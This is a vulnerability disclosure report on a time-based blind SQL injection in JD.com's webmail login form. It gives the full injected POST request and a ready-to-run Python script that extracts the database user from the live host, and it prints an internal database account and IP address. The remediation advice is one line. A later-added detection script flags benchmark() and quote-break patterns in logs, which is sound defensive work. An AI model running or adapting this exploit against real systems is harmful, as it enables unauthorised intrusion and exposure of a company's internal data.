
MySQL injection in an important JD.com system (with verification script)

2016-02-15 11:10, 746 views

Details:

Injection point:

```
POST https://mail.jd.com/Erpout/Logon.aspx 
captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5
```


The txtUser parameter is injectable (MySQL time-based blind injection). With benchmark(15000000,md5(1)) the response time exceeds 2.0 s.

Proof of vulnerability:

Guessing MySQL user() character by character yields:

```
[Done]MySQL user is jdmail_rw@172.17.27.41
```

```
database():   jdmail
```

Python verification script:

```python
#encoding=gbk
# Python 2 script (httplib, print statement); reproduced from the report with indentation restored.
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'ValiCode=PDC9BIL5P735'}
# candidate characters for each position of user()
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'start to retrive MySQL user:'
user = ''
for i in range(1, 23):
    for payload in payloads:
        conn = httplib.HTTPSConnection('mail.jd.com', timeout=30)
        s = "captcha=test&destination=https://mail.jd.com/owa/&" \
            "flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \
            "&trusted=4&txtPassword=test&" \
            "txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \
            "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \
            "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5"
        conn.request(method='POST',
                     url="/Erpout/Logon.aspx",
                     body=s,
                     headers = headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        conn.close()
        # a correct guess triggers benchmark() and delays the response
        if time.time() - start_time > 2.0:
            user += payload
            print '\n[In progress] %s' % user
            break
        else:
            print '.',
print '\n[Done]MySQL user is', user
```
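A defender-side check for the technique above, added here as an example and not part of the original report: it inspects logged POST bodies (as a WAF audit log or application middleware would see them) for the two signatures of this payload, a time-consuming function call and a quote break followed by an operator, and combines them with response latency. The record format, field names and sample records are constructed; only the injected txtUser value is taken from the report.

```python
import re
from urllib.parse import parse_qs

# Signatures of the MySQL time-based blind payload shown in the report:
# a delay function call, and a closing quote followed by a boolean operator.
TIME_FUNCS = re.compile(r"\b(benchmark|sleep)\s*\(", re.IGNORECASE)
QUOTE_BREAK = re.compile(r"'\s*(xor|or|and)\s*\(?", re.IGNORECASE)

def sqli_indicators(form_body):
    """Return indicator names found in any field of a URL-encoded form body."""
    found = []
    # parse_qs percent-decodes values, so %2c becomes ',' before matching
    for name, values in parse_qs(form_body, keep_blank_values=True).items():
        for value in values:
            if TIME_FUNCS.search(value):
                found.append("time_func:" + name)
            if QUOTE_BREAK.search(value):
                found.append("quote_break:" + name)
    return found

def find_blind_sqli(records, baseline_ms, delay_ms=2000):
    """Flag records whose body carries injection signatures or whose
    latency exceeds the baseline by the delay a benchmark() probe adds."""
    hits = []
    for rec in records:
        reasons = sqli_indicators(rec["body"])
        if rec["response_ms"] - baseline_ms >= delay_ms:
            reasons.append("slow_response")
        if reasons:
            hits.append((rec["id"], reasons))
    return hits

# Constructed sample records (hypothetical log format: id, form body, latency).
INJECTION = "aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb"
SAMPLE_RECORDS = [
    {"id": 1, "body": "captcha=test&txtPassword=test&txtUser=alice", "response_ms": 180},
    {"id": 2, "body": "captcha=test&txtPassword=test&txtUser=" + INJECTION, "response_ms": 2350},
    # slow but benign request: latency alone is a weak signal
    {"id": 3, "body": "captcha=test&txtPassword=test&txtUser=bob", "response_ms": 2400},
]

if __name__ == "__main__":
    for rec_id, reasons in find_blind_sqli(SAMPLE_RECORDS, baseline_ms=150):
        print(rec_id, reasons)
```

Because benchmark() only fires when the guessed character is right, most probe requests return at normal speed; the payload signatures, not latency, are the reliable signal, and latency serves to confirm a hit.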


Fix:

Escape and filter the parameters.